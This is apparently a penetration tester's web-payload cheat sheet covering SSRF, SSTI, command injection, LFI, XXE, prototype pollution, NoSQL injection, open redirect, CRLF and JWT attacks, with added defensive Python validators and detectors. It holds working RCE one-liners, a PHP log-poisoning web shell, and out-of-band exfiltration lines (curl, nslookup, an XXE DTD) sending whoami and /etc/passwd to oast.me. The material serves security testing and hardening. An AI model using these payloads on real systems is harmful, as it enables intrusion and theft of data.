These notes are public, opinionated, and evolving — read abdelkader.ma for the long-form posts.

Common Web Payloads

These are the first payloads I drop into a target. Not exhaustive — just the highest-yield first probe for each class. Once one fires, I switch to a class-specific page.

SSRF

http://127.0.0.1/
http://localhost/
http://169.254.169.254/                 # AWS IMDS v1
http://169.254.169.254/latest/meta-data/iam/security-credentials/
http://metadata.google.internal/        # GCP
http://100.100.100.200/                 # Alibaba Cloud
http://[::1]/                           # IPv6 localhost
http://0.0.0.0/
http://[0:0:0:0:0:ffff:127.0.0.1]/      # IPv6-mapped v4
http://2130706433/                      # decimal 127.0.0.1
http://0177.0.0.1/                      # octal
http://0x7f.0.0.1/                      # hex

Filter bypasses:

http://evil.com#@127.0.0.1/
http://127.0.0.1.nip.io/
http://127.0.0.1.evil.com/
file:///etc/passwd
gopher://127.0.0.1:6379/_*1%0d%0a$8%0d%0aflushall%0d%0a
dict://127.0.0.1:11211/stats

Read more: Web Challenge Methodology
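Defender-side counterpart, added here as an example (not from these notes): a URL validator that parses the host the way an HTTP client's resolver would, so the decimal, octal, hex and IPv6-mapped spellings above all land in the same blocked range, and that judges a name by what it resolves to rather than how it is spelled. The blocked ranges are an assumed policy, and `fake_resolver` with its DNS table is constructed so the check runs offline.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

# Ranges an outbound fetcher should never reach; policy assumed for this example.
BLOCKED_NETS = [ipaddress.ip_network(n) for n in (
    "0.0.0.0/8",                                        # 0.0.0.0 reaches loopback on Linux
    "127.0.0.0/8", "::1/128",                           # loopback
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",    # RFC 1918
    "169.254.0.0/16", "fe80::/10",                      # link-local, incl. 169.254.169.254
    "100.64.0.0/10",                                    # shared address space; 100.100.100.200 is here
    "fc00::/7",                                         # IPv6 unique local
)]

def parse_legacy_ipv4(host):
    """Parse an IPv4 literal the way BSD inet_aton() does: decimal (2130706433),
    octal (0177.0.0.1), hex (0x7f.0.0.1) and fewer-than-four-part forms (127.1).
    Returns an IPv4Address or None. A validator that only knows dotted decimal is
    bypassed by exactly these spellings, because the client's resolver knows them."""
    parts = host.split(".")
    if not 1 <= len(parts) <= 4:
        return None
    values = []
    for part in parts:
        try:
            if part[:2].lower() == "0x" and part[2:].isalnum():
                value = int(part[2:], 16)
            elif len(part) > 1 and part[0] == "0" and part.isdigit():
                value = int(part, 8)
            elif part.isdigit():
                value = int(part, 10)
            else:
                return None
        except ValueError:
            return None
        values.append(value)
    *leading, last = values
    if any(v > 255 for v in leading):
        return None
    width = 8 * (4 - len(leading))        # the last part fills every remaining byte
    if last >= 1 << width:
        return None
    number = 0
    for v in leading:
        number = (number << 8) | v
    return ipaddress.IPv4Address((number << width) | last)

def resolve_host(host):
    """Live resolver: every address the name maps to right now."""
    try:
        infos = socket.getaddrinfo(host, None)
    except socket.gaierror:
        return []
    return [ipaddress.ip_address(i[4][0].split("%")[0]) for i in infos]

def fake_resolver(host):
    """Constructed DNS answers so the example runs offline."""
    table = {
        "127.0.0.1.nip.io": ["127.0.0.1"],          # wildcard DNS echoes the embedded address
        "127.0.0.1.evil.com": ["127.0.0.1"],        # attacker-controlled zone, same effect
        "metadata.google.internal": ["169.254.169.254"],
        "evil.com": ["203.0.113.10"],               # TEST-NET-3, constructed
        "example.org": ["203.0.113.20"],
    }
    return [ipaddress.ip_address(a) for a in table.get(host, [])]

def is_blocked(addr):
    # ::ffff:127.0.0.1 is judged as the IPv4 address it wraps.
    if isinstance(addr, ipaddress.IPv6Address) and addr.ipv4_mapped is not None:
        addr = addr.ipv4_mapped
    return any(addr in net for net in BLOCKED_NETS)

def is_safe_url(url, resolver=resolve_host):
    """True only if the URL is http(s), carries no userinfo, and every address the
    host maps to is outside BLOCKED_NETS. Fails closed on anything unparseable."""
    try:
        parts = urlsplit(url)
    except ValueError:
        return False
    if parts.scheme not in ("http", "https") or "@" in parts.netloc:
        return False                                    # file://, gopher://, dict://, user@host
    host = parts.hostname
    if not host or host == "localhost" or host.endswith(".localhost"):
        return False
    legacy = parse_legacy_ipv4(host)
    if legacy is not None:
        addrs = [legacy]
    else:
        try:
            addrs = [ipaddress.ip_address(host)]       # IPv6 literal; urlsplit strips the brackets
        except ValueError:
            addrs = resolver(host)                     # a real name: judge it by its answers
    return bool(addrs) and not any(is_blocked(a) for a in addrs)
```

Two caveats that the code cannot express on its own. The `#@127.0.0.1` bypass works only when two URL parsers disagree; this checker sees `evil.com`, so validate and fetch with the same parser, and connect to the address the check returned rather than resolving the name a second time, which also closes the DNS-rebinding window. Redirects are a fresh URL each hop and need the same check again.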

SSTI

{{7*7}}              {{7*'7'}}                     # Jinja
${7*7}               #{7*7}                        # JSP, ERB
<%= 7*7 %>           %{(#a=7*7).toString()}        # JSP, OGNL/Struts
{{= 7*7 }}                                          # Twig (varies)
*{7*7}                                              # Thymeleaf

After confirmation — Jinja RCE one-liner:

{{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen('id').read() }}

Twig RCE:

{{ _self.env.registerUndefinedFilterCallback("exec") }}{{ _self.env.getFilter("id") }}

ERB / Ruby:

<%= `id` %>
<%= system('id') %>
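On the blue side, the probes above are easy to pick out of an access log once the request target is percent-decoded. The scanner below is an added example (not from these notes); the log lines are constructed, and the patterns cover only the delimiters and identifiers listed in this section.

```python
import re
from urllib.parse import unquote_plus

# A template delimiter followed by a small multiplication: the probe shapes listed above.
PROBE_RE = re.compile(r"(?:\{\{=?|\$\{|#\{|\*\{|%\{\(?#?\w*=?|<%=)\s*\d+\s*\*\s*['\"]?\d+['\"]?")

# Identifiers from the RCE one-liners above; in a request parameter they mark an exploit, not a probe.
SINK_RE = re.compile(r"__globals__|\.popen\(|registerUndefinedFilterCallback|getFilter\(|system\(|<%=\s*`[^`]*`")

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/')

# Constructed access-log lines (combined-log shape) carrying the payloads from this section.
LOG_LINES = [
    '10.0.0.5 - - [01/Jan/2024:00:00:01 +0000] "GET /search?q=%7B%7B7*7%7D%7D HTTP/1.1" 200 512',
    '10.0.0.5 - - [01/Jan/2024:00:00:02 +0000] "GET /search?q=%24%7B7*7%7D HTTP/1.1" 200 512',
    '10.0.0.5 - - [01/Jan/2024:00:00:03 +0000] "GET /search?q=%25%7B(%23a%3D7*7).toString()%7D HTTP/1.1" 200 512',
    '10.0.0.5 - - [01/Jan/2024:00:00:04 +0000] "GET /profile?name=%7B%7B%20self._TemplateReference__context.cycler.__init__.__globals__.os.popen(%27id%27).read()%20%7D%7D HTTP/1.1" 500 0',
    '10.0.0.6 - - [01/Jan/2024:00:00:05 +0000] "GET /search?q=hello+world HTTP/1.1" 200 512',
    '10.0.0.6 - - [01/Jan/2024:00:00:06 +0000] "GET /calc?expr=7*7 HTTP/1.1" 200 20',
]

def classify_request(line):
    """Return 'ssti-exploit', 'ssti-probe' or None for one access-log line."""
    match = REQUEST_RE.search(line)
    if not match:
        return None
    decoded = unquote_plus(match.group("target"))   # probes are URL-encoded in the log
    if SINK_RE.search(decoded):
        return "ssti-exploit"
    if PROBE_RE.search(decoded):
        return "ssti-probe"
    return None

def scan(lines):
    """(1-based line number, verdict) for every line that trips a pattern."""
    hits = []
    for number, line in enumerate(lines, 1):
        verdict = classify_request(line)
        if verdict:
            hits.append((number, verdict))
    return hits
```

The 500 on the exploit line is the other signal worth alerting on: a probe that renders returns 200 with `49` in the body, and the follow-up one-liner tends to error out before it works.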

Command injection

;id
&&id
|id
`id`
$(id)
%0aid
||id
%0d%0aid
;${IFS}id

Blind versions when output isn’t visible:

;sleep 5
;curl http://oast.me/$(whoami)
;nslookup $(whoami).oast.me
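Every separator above works because of one code shape: user input spliced into a string that a shell parses. Added example (not from these notes): `echo` stands in for whatever tool the app shells out to, `INJECTED` is a constructed marker, and the hostname pattern is an assumed allow-list policy. The vulnerable form sits next to the two fixes, argv lists and shape validation.

```python
import re
import subprocess

# Assumed policy for a lookup endpoint: DNS-label-shaped hostnames only.
HOSTNAME_RE = re.compile(
    r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*"
)

def run_vulnerable(user_input):
    """The bug: the input becomes part of a line that /bin/sh parses, so ';', '&&',
    '|', backticks, '$( )', a raw newline (%0a decoded) and ${IFS} all take effect."""
    completed = subprocess.run(f"echo {user_input}", shell=True, capture_output=True, text=True)
    return completed.stdout

def run_safe(user_input):
    """Fix 1: argv form. No shell is involved; the whole input is argv[1] of echo."""
    completed = subprocess.run(["echo", user_input], capture_output=True, text=True)
    return completed.stdout

def is_valid_hostname(value):
    """Fix 2: allow-list the shape before the value goes anywhere near a process."""
    return HOSTNAME_RE.fullmatch(value) is not None

def lookup(user_input):
    """What the endpoint should do: validate, then run without a shell."""
    if not is_valid_hostname(user_input):
        raise ValueError("refusing input that is not a hostname")
    return run_safe(user_input)
```

For the blind variants, the process tree is the detection: a web-server worker spawning `sleep`, `curl` or `nslookup` is a high-signal event for auditd or EDR, and a `$(whoami)` result showing up as a DNS label in resolver logs is the same event seen from the network.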

LFI

/etc/passwd
../../../../../../etc/passwd
....//....//....//etc/passwd
%2e%2e%2f%2e%2e%2fetc%2fpasswd
../../../../proc/self/environ           # leaks env vars including secrets
../../../../proc/self/cmdline
../../../../proc/self/cwd/<file>
php://filter/convert.base64-encode/resource=index.php
expect://id
data://text/plain,<?php phpinfo()?>

Log poisoning (LFI → RCE):

# In User-Agent: <?php system($_GET['c'])?>
GET /vuln.php?file=../../../../var/log/apache2/access.log&c=id
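The `....//` variant exists because a common filter strips `../` exactly once. Added example (not from these notes): that naive filter next to a resolver that decodes once, refuses wrapper syntax, lets the OS collapse `..` and symlinks, and only then checks the result is still under the web root. The temporary web root and its `notes.txt` are a constructed fixture.

```python
import os
import tempfile
from urllib.parse import unquote

def naive_strip(user_path):
    """The filter the '....//' payload defeats: one non-recursive removal of '../'."""
    return user_path.replace("../", "")

def safe_resolve(base_dir, user_path):
    """Real path of user_path inside base_dir, or None if it escapes.

    Percent-decodes once (so %2e%2e%2f is judged as ../), refuses stream-wrapper
    syntax (php://, expect://, data://) and NUL bytes, then resolves and checks
    containment. Nothing is stripped or rewritten, so there is nothing to double up."""
    decoded = unquote(user_path)
    if "://" in decoded or "\x00" in decoded:
        return None
    root = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(root, decoded))   # an absolute decoded path replaces root here
    if candidate == root or os.path.commonpath([root, candidate]) != root:
        return None
    return candidate

def make_demo_dir():
    """Constructed web root with one includable file (fixture, not app code)."""
    root = tempfile.mkdtemp(prefix="webroot-")
    with open(os.path.join(root, "notes.txt"), "w") as fh:
        fh.write("hello\n")
    return root

def read_include(base_dir, user_path):
    """The include endpoint, hardened: resolve first, read only what survived."""
    path = safe_resolve(base_dir, user_path)
    if path is None or not os.path.isfile(path):
        return None
    with open(path) as fh:
        return fh.read()
```

On the PHP side, `allow_url_include=Off` covers `data://` and remote includes, but `php://filter` is a local wrapper and is not affected by it, which is why the path check above is the control that matters. The log-poisoning chain needs the include to reach `access.log` at all; with the root pinned it cannot, and the app user should not be able to read the server's logs in any case.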

XXE

<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<foo>&xxe;</foo>

Out-of-band when response is blind:

<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY % ext SYSTEM "http://oast.me/x.dtd">
  %ext;
]>
<foo>bar</foo>

x.dtd:

<!ENTITY % data SYSTEM "file:///etc/passwd">
<!ENTITY % param "<!ENTITY &#x25; exfil SYSTEM 'http://oast.me/?d=%data;'>">
%param;
%exfil;
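Both payloads need a DOCTYPE, and the simplest hardening for untrusted XML is to refuse one outright rather than try to police entities. Added example (not from these notes), standard library only: expat reports the DOCTYPE the moment it opens, before any entity is declared, and it never fetches external entities unless a handler asks it to. The three documents are constructed from this section.

```python
import xml.etree.ElementTree as ET
import xml.parsers.expat as expat

class DtdNotAllowed(ValueError):
    """Untrusted XML carried a DOCTYPE, the carrier for every entity trick above."""

def check_no_dtd(data):
    """Stop at the first '<!DOCTYPE' without processing its subset.

    Raises DtdNotAllowed, or expat.ExpatError for malformed input."""
    parser = expat.ParserCreate()

    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise DtdNotAllowed(f"DOCTYPE {name!r} is not accepted from untrusted input")

    parser.StartDoctypeDeclHandler = on_doctype
    parser.Parse(data, True)

def is_safe_xml(data):
    try:
        check_no_dtd(data)
    except (DtdNotAllowed, expat.ExpatError):
        return False
    return True

def parse_untrusted(data):
    """Parse only after the DTD check, so an entity payload never reaches ElementTree."""
    check_no_dtd(data)
    return ET.fromstring(data)

# Constructed inputs: the two payloads from this section and a clean document.
INLINE_XXE = (b'<?xml version="1.0"?>\n<!DOCTYPE foo [\n'
              b'  <!ENTITY xxe SYSTEM "file:///etc/passwd">\n]>\n<foo>&xxe;</foo>')
OOB_XXE = (b'<?xml version="1.0"?>\n<!DOCTYPE foo [\n'
           b'  <!ENTITY % ext SYSTEM "http://oast.me/x.dtd">\n  %ext;\n]>\n<foo>bar</foo>')
CLEAN = b'<?xml version="1.0"?>\n<foo>bar</foo>'
```

If a format genuinely needs a DTD, the next-best setting is a parser with external entity and parameter entity resolution disabled; rejecting the DOCTYPE is preferable because it also removes entity-expansion denial of service.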

Prototype pollution

?__proto__[admin]=true
?__proto__.admin=true
?constructor[prototype][admin]=true

Body:

{"__proto__":{"admin":true}}
{"constructor":{"prototype":{"admin":true}}}

Browser sinks to chain into XSS / DOM-clobbering: Object.prototype.innerHTML, Object.prototype.src, Object.prototype.template.

NoSQL injection (MongoDB)

{"username":{"$ne":null},"password":{"$ne":null}}
{"username":"admin","password":{"$gt":""}}
{"username":{"$regex":"^a"},"password":{"$ne":null}}
{"$where":"sleep(5000)"}

Open redirect

?next=https://evil.com/
?next=//evil.com/
?next=/\evil.com/
?next=https:evil.com
?next=https://target.com.evil.com/
?next=https://target.com@evil.com/
?next=javascript:alert(1)

CRLF

%0d%0aSet-Cookie:%20admin=true
%0d%0aLocation:%20//evil.com
%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK
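Open redirect and CRLF both end up in the same place, the `Location` header, so one example covers both sections. Added here (not from these notes): a redirect-target check that only lets same-site paths or allow-listed hosts through, and a header-value check that refuses line breaks. `ALLOWED_HOSTS` is an assumed configuration; `CRLF_PAYLOADS` are this section's strings after the decoding the framework does before the app sees them.

```python
from urllib.parse import unquote, urlsplit

ALLOWED_HOSTS = {"target.com", "www.target.com"}   # assumed: the application's own hosts

# This section's payloads, decoded the way a framework hands a query parameter to the app.
CRLF_PAYLOADS = [unquote(p) for p in (
    "%0d%0aSet-Cookie:%20admin=true",
    "%0d%0aLocation:%20//evil.com",
    "%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK",
)]

def is_safe_header_value(value):
    """A CR, LF or NUL would end the header line and start a new one (or a new response)."""
    return not any(c in value for c in "\r\n\x00")

def safe_redirect_target(value, allowed_hosts=ALLOWED_HOSTS):
    """value if it is a same-site path or an http(s) URL on an allowed host, else None."""
    if not is_safe_header_value(value):
        return None
    if value.startswith("/"):
        # A path, unless it is protocol-relative ('//host') or the backslash spelling
        # ('/\host') that browsers normalise to the same thing.
        return None if value[1:2] in ("/", "\\") else value
    try:
        parts = urlsplit(value)
    except ValueError:
        return None
    if parts.scheme not in ("http", "https"):        # javascript:, data:, or no scheme at all
        return None
    if not parts.netloc or "@" in parts.netloc:      # 'https:evil.com' has no host; '@' hides the real one
        return None
    if parts.hostname not in allowed_hosts:          # 'target.com.evil.com' is a different host
        return None
    return value

def redirect_after_login(next_param, default="/"):
    """The value the login handler should put in Location."""
    target = safe_redirect_target(next_param)
    if target is None:
        target = default
    if not is_safe_header_value(target):
        raise ValueError("unsafe default redirect")
    return target
```

Most frameworks already reject CR and LF in header values; the check is still worth keeping in the application because the redirect target is also where the open-redirect decision is made, and the two checks belong together.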

JWT footguns

# Try the algo "none"
{"alg":"none","typ":"JWT"}.{"sub":"admin"}.

# Weak HMAC secret
hashcat -m 16500 token.txt /usr/share/wordlists/rockyou.txt

# Algo confusion: RS256 → HS256, with HMAC key = the public key
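All three footguns have the same root: the verifier lets the token choose the algorithm or accepts a key that is too short. Added example (not from these notes), standard library only: the algorithm comes from server configuration, `alg: none` is a mismatch, an HS256 token shown to an RS256-configured verifier is a mismatch before any key is touched, and keys under 256 bits are refused, which is the RFC 7518 section 3.2 minimum for HS256. Only HS256 is implemented here; `DEMO_KEY` and `OTHER_KEY` are generated for the example.

```python
import base64
import hashlib
import hmac
import json
import secrets

MIN_HS256_KEY_BYTES = 32      # RFC 7518 section 3.2: at least the hash output length

def b64url(raw):
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode("ascii")

def unb64url(text):
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))

def hs256_key_ok(key):
    """A key shorter than 256 bits is in range of a wordlist run; refuse it up front."""
    return isinstance(key, bytes) and len(key) >= MIN_HS256_KEY_BYTES

def sign_hs256(claims, key):
    if not hs256_key_ok(key):
        raise ValueError("HS256 key must be at least 32 random bytes")
    header = b64url(json.dumps({"alg": "HS256", "typ": "JWT"}, separators=(",", ":")).encode())
    payload = b64url(json.dumps(claims, separators=(",", ":")).encode())
    signing_input = f"{header}.{payload}"
    mac = hmac.new(key, signing_input.encode(), hashlib.sha256).digest()
    return f"{signing_input}.{b64url(mac)}"

def verify_token(token, expected_alg, key):
    """Claims if the token verifies under the configured algorithm, else None."""
    try:
        header_b64, payload_b64, sig_b64 = token.split(".")
        header = json.loads(unb64url(header_b64))
        claims = json.loads(unb64url(payload_b64))
        signature = unb64url(sig_b64)
    except ValueError:                       # wrong part count, bad base64, bad JSON
        return None
    if not isinstance(header, dict) or header.get("alg") != expected_alg:
        return None                          # "none" and swapped algorithms stop here
    if expected_alg == "HS256":
        if not hs256_key_ok(key):
            return None
        expected = hmac.new(key, f"{header_b64}.{payload_b64}".encode(), hashlib.sha256).digest()
        return claims if hmac.compare_digest(expected, signature) else None
    raise NotImplementedError(f"{expected_alg}: plug a verifier in here; never fall back to the header")

def unsigned_token(claims):
    """Test vector for the 'alg none' shape above: header.payload. with an empty signature."""
    header = b64url(json.dumps({"alg": "none", "typ": "JWT"}, separators=(",", ":")).encode())
    payload = b64url(json.dumps(claims, separators=(",", ":")).encode())
    return f"{header}.{payload}."

DEMO_KEY = secrets.token_bytes(32)      # generated for the example; provision real keys the same way
OTHER_KEY = secrets.token_bytes(32)     # a second key, standing in for a forger's guess
```

The length rule is what makes the hashcat line above a non-event: a 32-byte random secret is not in any wordlist. The `NotImplementedError` branch is deliberate; adding RS256 means adding an RSA verifier for that configured value, not reading `alg` from the token to pick one.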
⚠️ Paste any of these into authorised scope only. They are loud, logged, and if any of them succeed against a target you do not own, the legal problem is yours.